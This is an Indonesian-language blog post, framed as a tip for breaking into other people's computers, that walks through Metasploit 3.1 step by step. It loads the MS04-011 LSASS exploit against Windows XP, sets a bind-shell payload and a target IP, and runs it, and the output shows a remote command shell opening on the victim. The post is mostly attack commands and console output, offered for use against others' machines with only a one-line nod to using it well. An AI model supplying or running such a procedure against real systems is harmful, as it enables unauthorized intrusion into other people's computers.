(HOT TIPS) Cara Menyelinap Masuk Komputer Orang Lain!




Langkah-langkahnya…pake Metasploit Framework-3.1.

1. Jalanin programnya

2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..

3. maka akan muncul konsol spt ini

Quote:
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ — –=[ 262 exploits – 117 payloads
+ — –=[ 17 encoders – 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada…(tuk iseng doank)

Quote:
msf > show exploits

5. load modul exploit, qta gunain exploit lsass spt cara diatas

Quote:
msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target… misal target menggunakan XP

maka targetnya spt berikut :

Quote:
msf exploit(ms04_011_lsass) > set target 2

target => 2


7. Tampilin payloadnya apa aja yg ada..

Quote:
msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

Quote:
msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target…misal ip si target 192.168.113.14

Quote:
msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech…tinggal jalanin perintah exploit…

Quote:
msf exploit(ms04_011_lsass) > exploit[*] Started bind handler[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]…[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]…[*] Getting OS information…[*] Trying to exploit Windows 5.1[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened…ini menandakan qta sudah berhasil msk…dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin…isi session qta

Quote:
msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
— ———– ——
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu…kita masuk ke session 3 tersebut, untuk masuk ke konsol….

Quote:
msf exploit(ms04_011_lsass) > sessions -i 3[*] Starting interaction with 3…

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

13. Hehe…ente udah masuk deh ke komputer orang..

pergunakan dengan baik dan benar

Untuk Tutor lebih jelas liat aja di sini
http://backtrackbox.com/tutorial/sim…-framework.box

Terus buat download mesinnya disini aja ya : http://metasploit3.com/framework/download/

Tinggalkan komentar

Belum ada komentar.

Comments RSS TrackBack Identifier URI

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s